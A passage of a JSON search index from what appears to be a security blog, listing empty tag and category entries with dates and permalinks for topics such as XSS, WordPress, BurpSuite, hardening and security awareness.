2024","externalUrl":null,"permalink":"/tags/wordpress/","section":"Tags","summary":"","title":"WordPress","type":"tags"},{"content":"","date":"13 January 2023","externalUrl":null,"permalink":"/categories/application/","section":"Categories","summary":"","title":"Application","type":"categories"},{"content":"","date":"13 January 2023","externalUrl":null,"permalink":"/categories/vulnerabilities/","section":"Categories","summary":"","title":"Vulnerabilities","type":"categories"},{"content":"","date":"13 January 2023","externalUrl":null,"permalink":"/categories/web/","section":"Categories","summary":"","title":"Web","type":"categories"},{"content":"","date":"13 January 2023","externalUrl":null,"permalink":"/tags/xss-with-kurukshetra/","section":"Tags","summary":"","title":"XSS-With-Kurukshetra","type":"tags"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/tags/application/","section":"Tags","summary":"","title":"Application","type":"tags"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/categories/apps/","section":"Categories","summary":"","title":"Apps","type":"categories"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/tags/damn/","section":"Tags","summary":"","title":"Damn","type":"tags"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/categories/vulnerable/","section":"Categories","summary":"","title":"Vulnerable","type":"categories"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/tags/vulnerable/","section":"Tags","summary":"","title":"Vulnerable","type":"tags"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/tags/web/","section":"Tags","summary":"","title":"Web","type":"tags"},{"content":"","date":"20 August 2022","externalUrl":null,"permalink":"/categories/hardening/","section":"Categories","summary":"","title":"Hardening","type":"categories"},{"content":"","date":"20 August 2022","externalUrl":null,"permalink":"/tags/mitigation/","section":"Tags","summary":"","title":"Mitigation","type":"tags"},{"content":"","date":"20 August 2022","externalUrl":null,"permalink":"/tags/xss/","section":"Tags","summary":"","title":"XSS","type":"tags"},{"content":"","date":"29 July 2022","externalUrl":null,"permalink":"/tags/burpsuite/","section":"Tags","summary":"","title":"BurpSuite","type":"tags"},{"content":"","date":"29 July 2022","externalUrl":null,"permalink":"/categories/security-tools/","section":"Categories","summary":"","title":"Security Tools","type":"categories"},{"content":"","date":"26 July 2022","externalUrl":null,"permalink":"/categories/security-foundations/","section":"Categories","summary":"","title":"Security Foundations","type":"categories"},{"content":"","date":"2 July 2022","externalUrl":null,"permalink":"/categories/security-awareness/","section":"Categories","summary":"","title":"Security Awareness","type":"categories"},{"content":"","date":"2 July 2022","externalUrl":null,"permalink":"/tags/security-awareness/","section":"Tags","summary":"","title":"Security-Awareness","type":"tags"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"}]